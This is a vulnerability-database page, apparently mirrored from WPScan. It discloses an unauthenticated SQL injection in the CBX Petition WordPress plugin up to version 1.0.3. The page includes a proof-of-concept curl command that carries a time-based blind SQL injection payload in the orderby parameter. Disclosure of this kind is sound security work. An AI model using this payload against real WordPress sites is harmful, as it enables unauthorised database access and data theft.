Lucene search

K
wpvulndbCydaveWPVDB-ID:E0FE5A53-8AE2-4B67-AC6E-4A8860E39035
HistoryDec 27, 2022 - 12:00 a.m.

CBX Petition for WordPress <= 1.0.3 - Unauthenticated SQLi

2022-12-2700:00:00
cydave
wpscan.com
9
wordpress
sql injection
ajax action
unauthenticated users
security vulnerability
plugin

0.002 Low

EPSS

Percentile

61.2%

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

PoC

1. Create and publish a new petition. 2. Invoke the following curl command, with the nonce in place, to induce a 5-second sleep: curl -i ‘http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=cbxpetition_load_more_signs&amp;security;=’ \ --data ‘petition_id=2133&perpage;=30&order;=xxxxxxxxx&page;=2&orderby;=id AND (SELECT 4657 FROM (SELECT(SLEEP(5)))kvyf)’

CPENameOperatorVersion
cbxpetitioneq*

0.002 Low

EPSS

Percentile

61.2%

Related for WPVDB-ID:E0FE5A53-8AE2-4B67-AC6E-4A8860E39035